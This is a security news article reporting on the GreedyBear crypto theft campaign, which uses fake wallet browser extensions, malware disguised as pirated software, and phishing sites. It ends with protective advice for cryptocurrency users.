The GreedyBear crypto theft campaign has entered a more aggressive phase, targeting cryptocurrency users worldwide with a coordinated mix of fake browser extensions, phishing websites, and malicious software. Researchers say the group has stolen over $1 million in digital assets, marking one of its most profitable runs to date.
Expanding the Attack Arsenal
GreedyBear’s operation now uses three interconnected attack vectors, each designed to harvest sensitive data, steal cryptocurrency, and compromise victim devices.
1. Malicious Browser Extensions
Security analysts found more than 150 Firefox extensions mimicking popular crypto wallets, including MetaMask, TronLink, Exodus, and Rabby Wallet. Initially, these extensions appeared legitimate, often carrying high ratings and authentic-looking branding. Once installed, attackers used a method called Extension Hollowing to replace safe code with malware capable of logging wallet credentials, session data, and IP addresses before sending them to a central server.
2. Malware Deployment
GreedyBear also distributed nearly 500 Windows executables disguised as cracked or pirated software. These downloads carried information-stealing malware such as LummaStealer and, in some cases, ransomware variants. The group primarily hosted these files on Russian-language piracy sites, where unsuspecting users searching for free software became easy targets.
3. Phishing Websites
The group’s phishing network features realistic sites designed to impersonate cryptocurrency wallets, hardware wallet support pages, and account recovery services. These sites lure victims into entering seed phrases or private keys, allowing attackers to drain accounts instantly.
Centralized Command Infrastructure
All stolen data, phishing operations, and malware control traffic point to the same command-and-control server, identified at IP address 185.208.156.66. This server manages exfiltrated credentials, processes stolen cryptocurrency, and coordinates the deployment of ransomware payloads.
A Rapidly Growing Threat
Researchers link GreedyBear’s current tactics to its earlier “Foxy Wallet” campaign, which used just 40 fake extensions. The new phase more than triples that scale. As one security analyst put it: “GreedyBear isn’t just diversifying—it’s industrializing its operations.”
Conclusion
The GreedyBear crypto theft campaign illustrates how cybercriminals can combine browser exploitation, phishing, and malware to devastating effect. By controlling all channels through a single infrastructure, the group maximizes efficiency and scale. Security experts urge users to install wallet extensions only from verified sources, avoid downloading pirated software, and double-check URLs before entering any sensitive information.
0 responses to “GreedyBear Scales Up Crypto Theft with Extensions, Sites, and Malware”